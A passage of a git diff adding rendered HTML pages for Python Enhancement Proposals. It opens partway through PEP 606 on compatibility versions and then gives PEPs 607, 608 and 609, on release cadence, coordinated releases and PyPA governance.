Add -X compat_version=VERSION and -X min_compat_version=VERSION +command line options: call respectively +sys.set_python_compat_version() and +sys.set_python_min_compat_version(). VERSION is a version string +with 2 or 3 numbers (major.minor.micro or major.minor). For +example, -X compat_version=3.8 calls +sys.set_python_compat_version((3, 8)).

+

Add PYTHONCOMPATVERSION=VERSION and PYTHONCOMPATMINVERSION=VERSION environment variables: they call respectively sys.set_python_compat_version() and sys.set_python_min_compat_version(). VERSION is a version string with the same format as the command line options.
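For example, either of the following invocations (hypothetical, since the PEP was rejected; app.py is a placeholder script name) would request Python 3.8 compatibility at startup:

python3.9 -X compat_version=3.8 app.py
PYTHONCOMPATVERSION=3.8 python3.9 app.py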

+
+
+
+

Backwards Compatibility

+

Introducing the sys.set_python_compat_version() function means that an +application will behave differently depending on the compatibility +version. Moreover, since the version can be decreased multiple times, +the application can behave differently depending on the import order.

+

Python 3.9 with sys.set_python_compat_version((3, 8)) is not fully +compatible with Python 3.8: the compatibility is only partial.

+
+
+

Security Implications

+

sys.set_python_compat_version() must not disable security fixes.

+
+
+

Alternatives

+
+

Provide a workaround for each incompatible change

+

An application can work around most of the incompatible changes which impact it.

+

For example, collections aliases can be added back using:

+
import collections.abc
+collections.Mapping = collections.abc.Mapping
+collections.Sequence = collections.abc.Sequence
+
+
+
+
+

Handle backward compatibility in the parser

+

The parser is modified to support multiple versions of the Python +language (grammar).

+

The current Python parser cannot be easily modified for that. AST and +grammar are hardcoded to a single Python version.

+

In Python 3.8, compile() has an undocumented _feature_version parameter that makes it possible to not consider async and await as keywords.

+

The latest major backward incompatible language change was in Python 3.7, which made async and await real keywords. It seems like Twisted was the only affected project, and Twisted had a single affected function (it used a parameter called async).

+

Handling backward compatibility in the parser seems quite complex, not +only to modify the parser, but also for developers who have to check +which version of the Python language is used.

+
+

from __future__ import python38_syntax

+

Add pythonXY_syntax to the __future__ module. It would enable +backward compatibility with Python X.Y syntax, but only for the current +file.

+

With this option, there is no need to change +sys.implementation.cache_tag to use a different .pyc filename, +since the parser will always produce the same output for the same input +(except for the optimization level).

+

For example:

+
from __future__ import python35_syntax
+
+async = 1
+await = 2
+
+
+
+
+

Update cache_tag

+

Modify the parser to use sys.get_python_compat_version() to choose +the version of the Python language.

+

sys.set_python_compat_version() updates +sys.implementation.cache_tag to include the compatibility version +without the micro version as a suffix. For example, Python 3.9 uses +'cpython-39' by default, but +sys.set_python_compat_version((3, 7, 2)) sets cache_tag to +'cpython-39-37'. Changes to the Python language are now allowed +in micro releases.
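Today’s value can be inspected directly; the compatibility-suffixed value in the comment below is what the proposal describes, not current behaviour:

import sys

print(sys.implementation.cache_tag)  # e.g. 'cpython-39'
# Under this proposal, sys.set_python_compat_version((3, 7, 2)) would
# switch the tag to 'cpython-39-37', giving compatibility-mode .pyc
# files their own cache file names.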

+

One problem is that import asyncio is likely to fail if +sys.set_python_compat_version((3, 6)) has been called previously. +The code of the asyncio module requires async and await to +be real keywords (change done in Python 3.7).

+

Another problem is that regular users cannot write .pyc files into +system directories, and so cannot create them on demand. It means that +.pyc optimization cannot be used in the backward compatibility mode.

+

One solution for that is to modify the Python installer and Python +package installers to precompile .pyc files not only for the current +Python version, but also for multiple older Python versions (up to +Python 3.0?).

+

Each .py file would have 3n .pyc files (3 optimization levels), +where n is the number of supported Python versions. For example, it +means 6 .pyc files, instead of 3, to support Python 3.8 and Python +3.9.

+
+
+
+

Temporary moratorium on incompatible changes

+

In 2009, PEP 3003 “Python Language Moratorium” proposed a +temporary moratorium (suspension) of all changes to the Python language +syntax, semantics, and built-ins for Python 3.1 and Python 3.2.

+

In May 2018, during the PEP 572 discussions, it was also proposed to slow +down Python changes: see the python-dev thread Slow down…

+

Barry Warsaw’s call on this:

+
+
I don’t believe that the way for Python to remain relevant and +useful for the next 10 years is to cease all language evolution. +Who knows what the computing landscape will look like in 5 years, +let alone 10? Something as arbitrary as a 10-year moratorium is +(again, IMHO) a death sentence for the language.
+
+
+

PEP 387

+

PEP 387 – Backwards Compatibility Policy proposes a process to make +incompatible changes. The main point is the 4th step of the process:

+
+
See if there’s any feedback. Users not involved in the original +discussions may comment now after seeing the warning. Perhaps +reconsider.
+
+
+

PEP 497

+

PEP 497 – A standard mechanism for backward compatibility proposes different +solutions to provide backward compatibility.

+

Except for the __past__ mechanism idea, PEP 497 does not propose +concrete solutions:

+
+
When an incompatible change to core language syntax or semantics is +being made, Python-dev’s policy is to prefer and expect that, +wherever possible, a mechanism for backward compatibility be +considered and provided for future Python versions after the +breaking change is adopted by default, in addition to any mechanisms +proposed for forward compatibility such as new future_statements.
+
+
+
+

Examples of incompatible changes

+
+

Python 3.8

+

Examples of Python 3.8 incompatible changes:

+
    +
  • (During beta phase) PyCode_New() required a new parameter: it +broke all Cython extensions (all projects distributing precompiled +Cython code). This change has been reverted during the 3.8 beta phase +and a new PyCode_NewWithPosOnlyArgs() function was added instead.
  • +
• types.CodeType requires an additional mandatory parameter. The CodeType.replace() function was added to help projects stop depending on the exact signature of the CodeType constructor (see the sketch after this list).
  • +
  • C extensions are no longer linked to libpython.
  • +
  • sys.abiflags changed from 'm' to an empty string. +For example, python3.8m program is gone.
  • +
  • The C structure PyInterpreterState was made opaque. +
  • +
• XML attribute order: bpo-34160. This change broke several projects.
  • +
+
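A short sketch of the CodeType.replace() approach mentioned above (replace() and co_name are real Python 3.8+ APIs; the example function is arbitrary):

def add(x, y):
    return x + y

# Rename the code object without touching the CodeType constructor,
# whose signature changed in Python 3.8.
renamed = add.__code__.replace(co_name="plus")
print(renamed.co_name)  # 'plus'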

Backward compatibility cannot be added for all these changes. For +example, changes in the C API and in the build system are out of the +scope of this PEP.

+

See What’s New In Python 3.8: API and Feature Removals +for all changes.

+

See also the Porting to Python 3.8 +section of What’s New In Python 3.8.

+
+
+

Python 3.7

+

Examples of Python 3.7 incompatible changes:

+
    +
  • async and await are now reserved keywords.
  • +
  • Several undocumented internal imports were removed. One example is +that os.errno is no longer available; use import errno +directly instead. Note that such undocumented internal imports may be +removed any time without notice, even in micro version releases.
  • +
  • Unknown escapes consisting of '\' and an ASCII letter in +replacement templates for re.sub() were deprecated in Python 3.5, +and will now cause an error.
  • +
  • The asyncio.windows_utils.socketpair() function has been removed: +it was an alias to socket.socketpair().
  • +
  • asyncio no longer exports the selectors and _overlapped +modules as asyncio.selectors and asyncio._overlapped. Replace +from asyncio import selectors with import selectors.
  • +
• PEP 479 is enabled for all code in Python 3.7, meaning that StopIteration exceptions raised directly or indirectly in coroutines and generators are transformed into RuntimeError exceptions (see the sketch after this list).
  • +
  • socketserver.ThreadingMixIn.server_close() now waits until all +non-daemon threads complete. Set the new block_on_close class +attribute to False to get the pre-3.7 behaviour.
  • +
  • The struct.Struct.format type is now str instead of +bytes.
  • +
  • repr for datetime.timedelta has changed to include the keyword +arguments in the output.
  • +
  • tracemalloc.Traceback frames are now sorted from oldest to most +recent to be more consistent with traceback.
  • +
+
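For instance, the PEP 479 change listed above is easy to observe (a deliberately buggy generator, for illustration only):

def gen():
    yield 1
    raise StopIteration  # silently ended iteration before Python 3.7

try:
    list(gen())
except RuntimeError as exc:
    print("converted:", exc)  # "generator raised StopIteration"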

Adding backward compatibility for most of these changes would be easy.

+

See also the Porting to Python 3.7 +section of What’s New In Python 3.7.

+
+
+

Micro releases

+

Sometimes, incompatible changes are introduced in micro releases +(micro in major.minor.micro) to fix bugs or security +vulnerabilities. Examples include:

+
    +
  • Python 3.7.2, compileall and py_compile module: the +invalidation_mode parameter’s default value is updated to None; +the SOURCE_DATE_EPOCH environment variable no longer +overrides the value of the invalidation_mode argument, and +determines its default value instead.
  • +
  • Python 3.7.1, xml modules: the SAX parser no longer processes +general external entities by default to increase security by default.
  • +
  • Python 3.5.2, os.urandom(): on Linux, if the getrandom() +syscall blocks (the urandom entropy pool is not initialized yet), fall +back on reading /dev/urandom.
  • +
  • Python 3.5.1, sys.setrecursionlimit(): a RecursionError +exception is now raised if the new limit is too low at the current +recursion depth.
  • +
  • Python 3.4.4, ssl.create_default_context(): RC4 was dropped from +the default cipher string.
  • +
  • Python 3.4.3, http.client: HTTPSConnection now performs all +the necessary certificate and hostname checks by default.
  • +
  • Python 3.4.2, email.message: EmailMessage.is_attachment() is +now a method instead of a property, for consistency with +Message.is_multipart().
  • +
  • Python 3.4.1, os.makedirs(name, mode=0o777, exist_ok=False): +Before Python 3.4.1, if exist_ok was True and the directory +existed, makedirs() would still raise an error if mode did not +match the mode of the existing directory. Since this behavior was +impossible to implement safely, it was removed in Python 3.4.1 +(bpo-21082).
  • +
+

Examples of changes made in micro releases which are not backward +incompatible:

+
    +
  • ssl.OP_NO_TLSv1_3 constant was added to 2.7.15, 3.6.3 and 3.7.0 +for backwards compatibility with OpenSSL 1.0.2.
  • +
  • typing.AsyncContextManager was added to Python 3.6.2.
  • +
  • The zipfile module accepts a path-like object since Python 3.6.2.
  • +
  • loop.create_future() was added to Python 3.5.2 in the asyncio +module.
  • +
+

No backward compatibility code is needed for these kinds of changes.

+
+
+
+

References

+

Accepted PEPs:

+ +

Draft PEPs:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0606.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
diff --git a/pep-0607/index.html b/pep-0607/index.html new file mode 100644 index 00000000000..252be181ace --- /dev/null +++ b/pep-0607/index.html @@ -0,0 +1,315 @@
+
+


+ + +
+
+
+

PEP 607 – Reducing CPython’s Feature Delivery Latency

+
+
Author:
+
Łukasz Langa <lukasz at python.org>, +Steve Dower <steve.dower at python.org>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
11-Oct-2019
+
Python-Version:
+
3.9
+
Post-History:
+
20-Oct-2019
+
+
+
+
+
+

Abstract

+

PEP 602 and PEP 605 describe two alternative approaches to delivering smaller +collections of features to Python’s users more frequently (as compared to the +current approach of offering new feature releases every 18-24 months, with +the first binary alpha release taking place 6-8 months before the final release).

+

Both PEPs also propose moving to a release cadence that results in full releases +occurring at a consistent time of year (every year for PEP 602, every other +year for PEP 605).

+

This PEP (from the authors of both competing proposals) provides common +background on why a change in the release cadence is considered desirable, +as well as the perceived risks that both PEPs attempt to mitigate.

+
+
+

Rationale for change

+
+

Reducing the size of feature delivery batches

+

When multiple large changes are delivered together, a complex investigation +may be required to determine the root cause of any new issues that arise. +Large batch sizes also make it more likely that problems will be encountered, +given that they include larger pieces of relatively untested code.

+

The easiest way to simplify those investigations and reduce the likelihood of +users encountering problems is to reduce the size of the batches being shipped.

+

PEP 602 proposes to address this problem via the straightforward approach of +reducing CPython’s typical batch size by 50%, shipping 12 months of changes +each time, rather than accumulating 18+ months of changes.

+

PEP 605 proposes to address it by regularly delivering 2 months worth of changes +to a subset of Python’s user base that opts in to running a rolling stream of +beta releases (similar to running Windows Insider builds instead of the Windows +retail release, or running Debian testing instead of Debian stable).

+
+
+

Reducing the latency of feature delivery

+

When only stable releases are seeing significant user adoption, and there’s a +long period of time between stable releases, it creates an incredibly strong +temptation for developers to push changes into stable releases before they’re +really ready for general use.

+

PEP 602 proposes to address this problem by reducing the period of time +between stable releases to 12 months rather than 18 months.

+

PEP 605 proposes to address it by actively creating a community of +Python users that regularly install and use CPython beta releases, providing an +incentive for core developers to start shipping changes earlier in the +pre-release cycle, in order to obtain feedback before the feature gets locked +down in a stable release.

+
+
+

Aligning the release cadence with the calendar year

+

While the current release cadence is nominally 18-24 months, in practice it has +consistently been towards the 18 month end of that range. This means that the +target dates for pre-releases and final releases move around from release to +release, and the only way to remember them is to either look at the release PEP, +or else to add those dates to your calendar. This is annoying for both +individual volunteers and for corporate contributors, and also complicates +alignment with events like PyCon US (typically April/May) and the now-annual +core development sprints (typically in September).

+

PEP 602 proposes to address this problem by publishing a new release in October +every year, and basing the pre-release calendar for each year off that.

+

PEP 605 proposes to address this problem by alternating between release years +(where a new stable release is published in August), and non-release years +(where only maintenance releases and new rolling beta releases are published).

+
+
+

Improving the pre-release design feedback cycle

+

One of the challenges of designing changes to the core interpreter and standard +library APIs is that the user base in a position to provide feedback on +nightly builds and the current pre-releases is relatively limited. This means +that much user feedback isn’t received until after an API design has already +shipped in a full X.Y.0 release.

+

If the API is a regular API, then deprecation cycles mean that it may take +literally years to correct any design mistakes identified at that point. +Marking APIs as provisional nominally offers a way to avoid that constraint, +but actually taking advantage of that freedom causes other problems.

+

PEP 602 proposes to address this problem by starting the alpha period +immediately after the previous stable release.

+

PEP 605 proposes to address this problem by actively promoting adoption of +CPython pre-releases for running production workloads (not just for library and +application compatibility testing), and adjusting the pre-release management +process as necessary to make that a reasonable thing to do.

+

(Note: some standard library APIs are amenable to initially being shipped as +part of separately versioned packages via PyPI, and only later incorporated +into the standard library. This section is more about the lower level APIs +and non-library features where that approach to obtaining early design +feedback doesn’t apply)

+
+
+
+

Risks to be mitigated

+

While the status quo could stand to be improved in some respects, Python’s +popularity indicates that a lot of users and other participants in the wider +Python ecosystem are happy enough with the current release management process.

+

Python’s user base is too large and +too varied +to cover all the potential downsides of changing our release cadence here, so +instead this section just covers some of the points that have been specifically +taken into account in the design of the PEPs.

+
+

Impact on users and redistributors that already skip some releases

+

It is already the case that not all users and redistributors update to every +published CPython release series (for example, Debian stable and Ubuntu LTS +sometimes skip releases due to the mismatch between their 24-month release +cycles and CPython’s typically 18-month cycle).

+

The faster 12-month full release cadence in PEP 602 means that users in this +category may end up skipping two releases where they would previously have only +skipped one. However, the extended notice period for deprecations means that +skipping a single release should no longer result in missed deprecation warnings.

+

The slower 24-month full release cadence in PEP 605 may move some of the users +that have historically been in this category into the “update to every stable +release” category.

+
+
+

Impact on users and redistributors that update to every release

+

Many of Python’s users never install a pre-release, but do update to every +stable release series at some point after it is published.

+

PEP 602 aims to mitigate the potential negative impact on members of this group +by keeping the minimum gap between releases to 12 months, and retaining the +18 month full support period for each release.

+

Keeping the 18-month full support period for each release branch means that the +branches will spend roughly the same amount of time in full support and +security-fix-only mode as they do now (~18 months and ~42 months, respectively).

+

PEP 605 aims to mitigate the potential negative impact on members of this group +by increasing use during the pre-release period to achieve more stable final +releases with wider ecosystem support at launch.

+

With a 24-month release cadence each release branch will spend proportionally +more time in full support mode and less time in security-fix-only mode +(~24 months and ~36 months, respectively).

+

Full discussion of the impact on this group is left to the individual PEPs.

+
+
+

Impact on users and redistributors of CPython nightly builds

+

Despite the difficulties of doing so, there are already some users and +redistributors that take on the challenge of using or publishing the CPython +master branch directly.

+

Neither PEP 602 nor PEP 605 should directly affect this group, but the rolling +release stream proposal in PEP 605 aims to lower the barriers to more users +adopting this style of usage, by allowing them to adopt the tested rolling +beta stream, rather than needing to use the master branch directly.

+
+
+

Impact on maintainers of third party libraries

+

For maintainers of third party libraries, the key source of support complexity +is the number of different Python versions in widespread use.

+

PEP 602 aims to mitigate the potential negative impact on members of this group +by keeping the minimum gap between full releases to 12 months.

+

PEP 605 aims to mitigate the potential negative impact on members of this group +by increasing the gap between full releases to 24 months, retaining the current +policy of moving each release branch to security-fix-only mode not long after +its successor is released, and retaining the “beta” naming scheme for the new +rolling release stream (at least for the Python 3.9 release cycle).

+

Full discussion of the impact on this group is left to the individual PEPs.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0607.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0608/index.html b/pep-0608/index.html new file mode 100644 index 00000000000..9c5d896fca2 --- /dev/null +++ b/pep-0608/index.html @@ -0,0 +1,392 @@ + + + + + + + + PEP 608 – Coordinated Python release | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 608 – Coordinated Python release

+
+
Author:
+
Miro Hrončok <miro at hroncok.cz>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2019
+
Python-Version:
+
3.9
+
+
+
+
Table of Contents +
+
+

Abstract

+

Block a Python release until a compatible version of selected projects +is available.

+

The Python release manager can decide to release Python even if a +project is not compatible, if they decide that the project is going to +be fixed soon enough, or if the issue severity is low enough.

+
+
+

Rationale

+

The PEP involves maintainers of the selected projects in the Python release cycle. There are multiple benefits:

+
    +
  • Detect more bugs before a Python final release
  • +
  • Discuss and maybe revert incompatible changes before a Python final +release
  • +
  • Increase the number of compatible projects when the new Python final +version is released
  • +
+
+

Too few projects are involved in the Python beta phase

+

Currently, Python beta versions are available four months before the +final 3.x.0 release.

+

Bugs reported during the beta phase can be easily fixed and can block a +release if they are serious enough.

+

Incompatible changes are discussed during the beta phase: enhancing the documentation that explains how to update code, or considering whether to revert these changes.

+

Even if more and more projects are tested on the master branch of Python in their CI, too many of the top 50 PyPI projects only become compatible with the new Python a few weeks, or even months, after the final Python release.

+
+
+

DeprecationWarning is being ignored

+

Python has a well-defined process for deprecating features. A DeprecationWarning must be emitted during at least one Python release before a feature can be removed.
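For illustration, a minimal sketch of what this process looks like in code (the function names here are hypothetical, not from any real project):

import warnings

def new_api():
    return 42

def old_api():
    # Deprecated alias: a DeprecationWarning must be emitted for at
    # least one release before old_api() can be removed.
    warnings.warn(
        "old_api() is deprecated, use new_api() instead",
        DeprecationWarning,
        stacklevel=2,
    )
    return new_api()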

+

In practice, DeprecationWarning warnings are ignored for years in major Python projects. Usually, maintainers explain that there are too many warnings, and so they simply ignore them. Moreover, DeprecationWarning is silent by default (except in the __main__ module: PEP 565).

+

Even if more and more projects are running their test suite with +warnings treated as errors (-Werror), Python core developers still +have no idea how many projects are broken when a feature is removed.

+
+
+

Need to coordinate

+

When issues and incompatible changes are discovered and discussed after +the final Python release, it becomes way more complicated and expensive +to fix Python. Once an API is part of an official final release, Python +should provide backward compatibility for the whole 3.x release +lifetime. Some operating systems can be shipped with the buggy final +release and can take several months before being updated.

+

Too many projects are only updated to the new Python after the final +Python release, which makes this new Python version barely usable to run +large applications when Python is released.

+

It is proposed to block a Python release until a compatible version of +all selected projects is available.

+
+
+

Shorter Python release schedule

+

PEP 602 (Annual Release Cycle for Python) and PEP 605 (A rolling feature release stream for CPython) would like to release Python more often, to ship new features more quickly.

+

The problem is that each Python 3.x release breaks many projects.

+

Coordinated Python releases would reduce the number of broken projects and make new Python releases more usable.

+
+
+
+

Specification

+

By default, a Python release is blocked until a compatible version of +all selected projects is available.

+

Before releasing the final Python version, the Python release manager is responsible for sending a report on the compatibility status of each of the selected projects. It is recommended to send such a report at each beta release, to track the evolution and detect issues as soon as possible.

+

The Python release manager can decide to release Python even if a +project is not compatible, if they decide that the project is going to +be fixed soon enough, or if the issue severity is low enough.

+

After each Python release, the project list can be updated to remove +projects and add new ones. For example, to remove old unused +dependencies and add new ones. The list can grow if the whole process +doesn’t block Python releases for too long.

+
+

Limit the delay

+

When a build or test issue with the next Python version is reported to a +project, maintainers have one month to answer. With no answer, the +project can be excluded from the list of projects blocking the Python +release.

+

Multiple projects are already tested on the master branch of Python in a CI. Problems can be detected very early in a Python release cycle, which should provide enough time to handle them. More CI can be added for projects which are not yet tested on the next Python.

+

Once issues with the selected projects are known, exceptions can be discussed between the Python release manager and the involved project maintainers on a case-by-case basis. Not all issues deserve to block a Python release.

+
+
+

Selected projects

+

List of projects blocking a Python release (total: 27):

+
    +
  • Projects (13):
      +
    • aiohttp
    • +
    • cryptography
    • +
    • Cython
    • +
    • Django
    • +
    • numpy
    • +
    • pandas
    • +
    • pip
    • +
    • requests
    • +
    • scipy
    • +
    • Sphinx (needed to build Python)
    • +
    • sqlalchemy
    • +
    • pytest
    • +
    • tox
    • +
    +
  • +
  • Direct and indirect dependencies (14):
      +
    • certifi (needed by urllib3)
    • +
    • cffi (needed by cryptography)
    • +
    • chardet (needed by Sphinx)
    • +
    • colorama (needed by pip)
    • +
    • docutils (needed by Sphinx)
    • +
    • idna (needed by Sphinx and requests)
    • +
    • jinja2 (needed by Sphinx)
    • +
    • MarkupSafe (needed by Sphinx)
    • +
    • psycopg2 (needed by Django)
    • +
    • pycparser (needed by cffi)
    • +
    • setuptools (needed by pip and tons of Python projects)
    • +
    • six (needed by tons of Python projects)
    • +
    • urllib3 (needed by requests)
    • +
    • wheel (needed by pip)
    • +
    +
  • +
+
+
+

How projects are selected

+

Projects used to build Python, like Sphinx, should be in the list.

+

The most popular projects are picked from the most downloaded PyPI projects.

+

Most project dependencies are included in the list as well, since a single incompatible dependency can block a whole project. Some dependencies are excluded to reduce the list length.

+

Test dependencies such as pytest and tox should be included as well. If a project cannot be tested, a new version cannot be shipped either.

+

The list should be long enough to have a good idea of the cost of +porting a project to the next Python, but small enough to not block a +Python release for too long.

+

Obviously, projects which are not part of the list are also encouraged to report issues with the next Python and to have a CI running on the next Python version.

+
+
+
+

Incompatible changes

+

The definition here is broad: any Python change which causes an issue when building or testing a project.

+

See also the PEP 606: Python Compatibility Version for more examples of +incompatible changes.

+
+

Examples

+

There are different kinds of incompatible changes:

+
    +
  • Change in the Python build. For example, Python 3.8 removed 'm' +(which stands for pymalloc) from sys.abiflags which impacts Python +vendors like Linux distributions.
  • +
  • Change in the C extensions build. For example, Python 3.8 no longer +links C extensions to libpython, and Python 3.7 removed +os.errno alias to the errno module.
  • +
  • Removed function. For example, collections aliases to ABC classes +have been removed in Python 3.9.
  • +
  • Changed function signature:
      +
    • Reject a type which was previously accepted (ex: only accept int, +reject float).
    • +
    • Add a new mandatory parameter.
    • +
    • Convert a positional-or-keyword parameter to positional-only.
    • +
    +
  • +
  • Behavior change. For example, Python 3.8 now serializes XML attributes +in their insertion order, rather than sorting them by name.
  • +
  • New warning. Since more and more projects are tested with all warnings +treated as errors, any new warning can cause a project test to fail.
  • +
  • Function removed from the C API.
  • +
  • Structure made opaque in the C API. For example, PyInterpreterState +became opaque in Python 3.8 which broke projects accessing +interp->modules (PyImport_GetModuleDict() should be used +instead).
  • +
+
+
+

Cleaning up Python and DeprecationWarning

+

One of the mottos of the Zen of Python (PEP 20) is:

+
+
There should be one– and preferably only one –obvious way to do +it.
+

When Python evolves, new ways inevitably emerge. DeprecationWarning warnings are emitted to suggest using the new way, but many developers ignore these warnings, which are silent by default.

+

Sometimes, supporting both ways has a minor maintenance cost, but Python core developers prefer to drop the old way to clean up the Python code base and standard library. Such changes are backward incompatible.

+

More incompatible changes than usual should be expected with the end of Python 2 support, which is a good opportunity to clean up old Python code.

+
+
+
+

Distributed CI

+

Checking if selected projects are compatible with the master branch +of Python can be automated using a distributed CI.

+

Existing CIs can be reused.

+

New CIs can be added for projects which are not tested on the next +Python yet.

+

It is recommended to treat DeprecationWarning warnings as errors when +testing on the next Python.
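For example, Python's standard -W option can turn DeprecationWarning into an error for a whole test run (shown here with pytest, though any test runner can be invoked the same way):

python -W error::DeprecationWarning -m pytest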

+

A job testing a project on the next Python doesn’t have to be +“mandatory” (block the whole CI). It is fine to have failures during the +beta phase of a Python release. The job only has to pass for the final +Python release.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0608.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0609/index.html b/pep-0609/index.html new file mode 100644 index 00000000000..90e2af62138 --- /dev/null +++ b/pep-0609/index.html @@ -0,0 +1,417 @@ + + + + + + + + PEP 609 – Python Packaging Authority (PyPA) Governance | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 609 – Python Packaging Authority (PyPA) Governance

+
+
Author:
+
Dustin Ingram <di at python.org>, +Pradyun Gedam <pradyunsg at gmail.com>, +Sumana Harihareswara <sh at changeset.nyc>
+
Sponsor:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance, Packaging
+
Created:
+
05-Nov-2019
+
Post-History:
+
05-Nov-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes a governance model for the Python Packaging +Authority (PyPA). The model is closely based on existing informal +practices, with the intent of providing clarity into the functioning +of the PyPA and formalizing transparent processes for the PyPA.

+
+
+

Rationale

+

The Python Packaging Authority (PyPA) is a collaborative community +that maintains and advances many of the relevant projects in Python +packaging. The software and standards developed through the PyPA are +used to package, share, and install Python software and to interact +with indexes of downloadable Python software such as PyPI, the +Python Package Index.

+

Currently, the PyPA is an informal and loosely defined organization +that lacks true authority, and the inclusion of a given project under +the PyPA umbrella or the creation of new projects has been done in an +ad-hoc, one-off manner. Similarly, individual membership in the PyPA +is not well-defined.

+

While this model has more or less worked for the PyPA in the past, it +results in an organization which is missing certain features of a +stable ecosystem, namely a clear and transparent decision-making +process. This PEP seeks to rectify this by defining a governance model +for the PyPA.

+
+
+

Terminology

+

Relevant terms for groups of individual contributors used in this PEP:

+
+
PyPA members:
Anyone with the triage bit or commit bit, on at least one project in +the PyPA organization.
+
PyPA committers:
Anyone with the commit bit on at least one project in the PyPA +organization, which should correspond to everyone on the +PyPA-Committers mailing list.
+
PyPA community:
Anyone who is interested in PyPA activity and wants to follow along, +contribute or make proposals.
+
Packaging-WG members:
As described in the Packaging-WG Wiki page. For clarity: there is no +formal relationship between the Packaging-WG and PyPA. This group is +only included in this list to disambiguate it from PyPA.
+
+
+
+

Goals

+

The following section formalizes the goals (and non-goals) of the PyPA +and this governance model.

+
+

Goals of the PyPA

+

These goals are the primary motivation for the existence of the PyPA. +These goals are largely already being carried out, even though most +have not been explicitly defined.

+
+

Provide support for existing projects under the PyPA

+

In the event that a given project needs additional support, or no +longer has active maintainers, the PyPA will ensure that the given +project will continue to be supported for users to the extent +necessary.

+
+
+

Foster the creation and acceptance of standards for PyPA projects

+

The PyPA should, as much as possible, strive for standardization and coordination across PyPA projects, primarily through the governance process outlined below. PyPA projects are expected to abide by applicable specifications maintained by the PyPA.

+
+
+

Guide decisions which affect multiple PyPA projects

+

The PyPA community (especially PyPA members) should be expected to +provide opinions, insight and experience when ecosystem-wide changes +are being proposed.

+
+
+

Determine which projects should be under the guidance of the PyPA

+

For example: accepting new projects from the community, organically +creating projects within the PyPA, etc.

+
+
+

Enforce adherence to a Code of Conduct across all projects

+

Generally this means leading by example, but occasionally it may mean +more explicit moderation.

+
+
+
+

Non-goals of the PyPA

+

These are specific items that are explicitly not goals of the PyPA.

+
+

Determine who is and isn’t a PyPA member

+

This is for members of individual projects to decide, as they add new members to their projects. Maintainership of a project that is under the PyPA organization automatically confers membership in the PyPA.

+
+
+

Micromanage individual projects

+

As long as the project is adhering to the Code of Conduct and following specifications supported by the PyPA, the PyPA should only be concerned with large, ecosystem-wide changes.

+
+
+

Develop and maintain a standalone Code of Conduct

+

PyPA projects follow the PSF Code of Conduct.

+
+
+
+

Goals of the PyPA’s Governance Model

+

These are new goals which the governance model seeks to make possible.

+
+

Transparency in PyPA membership

+

Provide a transparent process for decisions taken, regarding project +membership in the PyPA.

+
+
+

Document PyPA’s use of PEPs

+

Formally document how the PyPA uses Python Enhancement Proposals +(PEPs), for maintaining interoperability specifications defined by the +PyPA.

+
+
+
+
+

Processes

+

The processes for the PyPA’s activities are outlined below:

+
+

Specifications

+

The PyPA will use PEPs for defining, and making changes to, the +interoperability specifications maintained by the PyPA. Thus, the +Python Steering Council has the final say in the acceptance of these +interoperability specifications.

+

It is expected (but not required) that the Python Steering Council +would delegate authority to sponsor and/or approve/reject PEPs related +to packaging interoperability specifications, to individuals within the +PyPA community. At the time of writing (June 2020), the Python Steering +Council has standing delegations for currently active packaging +interoperability specifications.

+

The details of the process of proposing and updating the +interoperability specifications are described in the PyPA +Specifications document.

+
+
+

Governance

+
+

PyPA Committer Votes

+

A PyPA member can put forward a proposal and call for a vote on a +public PyPA communication channel. A PyPA committer vote is triggered +when a PyPA committer (not the proposer) seconds the proposal.

+

The proposal will be put to a vote on the PyPA-Committers mailing list, over a 7-day period. Each PyPA committer can vote once, and can choose either +1 or -1. If at least two thirds of recorded votes are +1, then the vote succeeds.

+

PyPA committer votes are required for, and limited to, the following +kinds of proposals:

+
+
Addition of a project to the PyPA
+

Proposing the acceptance of a project into the PyPA organization. This +proposal must not be opposed by the existing maintainers of the +project.

+
+
+
Creation of a new project in the PyPA
+

Proposing the creation of a new tool/project in the PyPA organization.

+
+
+
Removal of a project from PyPA
+

Proposing the removal of a project from the PyPA organization.

+
+
+
Updates to the Governance/Specification Processes
+

Proposing changes to how the PyPA operates, including but not limited +to changes to its specification and governance processes, and this +PEP.

+
+
+
+

Leaving PyPA

+

A project that is a part of the PyPA organization can request to leave PyPA.

+

Such requests can be made by a committer of the project, on the PyPA-Committers mailing list, and must clearly state the GitHub user/organization to transfer the repository to.

+

If the request is not opposed by another committer of the same project +over a 7-day period, the project would leave the PyPA and be +transferred out of the PyPA organization as per the request.

+
+
+

Code of Conduct enforcement

+

Each project that is a part of the PyPA organization follows the PSF +Code of Conduct, including its incident reporting guidelines and +enforcement procedures.

+

PyPA members are responsible for leading by example. PyPA members +occasionally may need to more explicitly moderate behavior in their +projects, and each project that is a part of the PyPA organization +must designate at least one PyPA member as available to contact in +case of a Code of Conduct incident. If told of any Code of Conduct +incidents involving their projects, PyPA members are expected to +report those incidents up to the PSF Conduct WG, for recording +purposes and for potential assistance.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0609.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
